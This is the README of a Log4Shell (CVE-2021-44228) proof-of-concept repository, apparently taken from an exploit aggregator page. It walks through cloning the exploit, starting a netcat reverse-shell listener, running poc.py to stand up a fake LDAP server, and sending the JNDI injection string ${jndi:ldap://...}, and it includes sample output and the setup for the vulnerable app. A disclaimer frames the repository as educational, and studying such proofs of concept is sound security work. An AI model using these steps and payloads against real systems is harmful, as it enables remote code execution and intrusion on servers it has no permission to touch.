Share
## https://sploitus.com/exploit?id=7DBFF6FA-15F2-5D96-A930-7F95ACAE62E7
# log4j-shell-poc
A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability, forked from [kozmer](https://github.com/kozmer/log4j-shell-poc). 
Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others.

In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it.

Proof-of-concept (POC)
----------------------

#### Clone:
```bash
git clone https://github.com/TTN-ATTN/log4j-shell-poc.git
cd log4j-shell-poc/
```

#### Install requirements:
```bash
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
```
#### Usage:


* In the first terminal, start a netcat listener to accept reverse shell connection.
```bash
nc -lvnp 9001
```

* In the second terminal, launch the exploit.
```bash
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/TTN-ATTN/log4j-shell-poc.git

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389
```

**Note:** For this to work, the extracted java archive has to be named: `jdk1.8.0_20` and be in the same directory. This can be downloaded from [jdk-8u20-linux-x64.tar.gz](https://download.oracle.com/otn/java/jdk/8u20-b26/jdk-8u20-linux-x64.tar.gz).


* In the third terminal, launch the vulnerable application 
```bash
chmod +x run.sh
./run.sh
```



Getting the Java version.
--------------------------------------

Oracle thankfully provides an archive for all previous java versions:
[https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html).
Scroll down to `8u20` and download the appropriate files for your operating system and hardware.
![Screenshot from 2021-12-11 00-09-25](https://user-images.githubusercontent.com/46561460/145655967-b5808b9f-d919-476f-9cbc-ed9eaff51585.png)

**Note:** You do need to make an account to be able to download the package.


**Note:** Make sure to extract the jdk folder into this repository with the same name in order for it to work.

```
โฏ tar -xf jdk-8u20-linux-x64.tar.gz

โฏ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)
```

Disclaimer
----------
This repository is not intended to be a one-click exploit to CVE-2021-44228. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications (however there are better applications for this purpose, ei: [https://log4shell.tools/](https://log4shell.tools/)).

---
### Credits
Original POC by [kozmer](https://github.com/kozmer/log4j-shell-poc).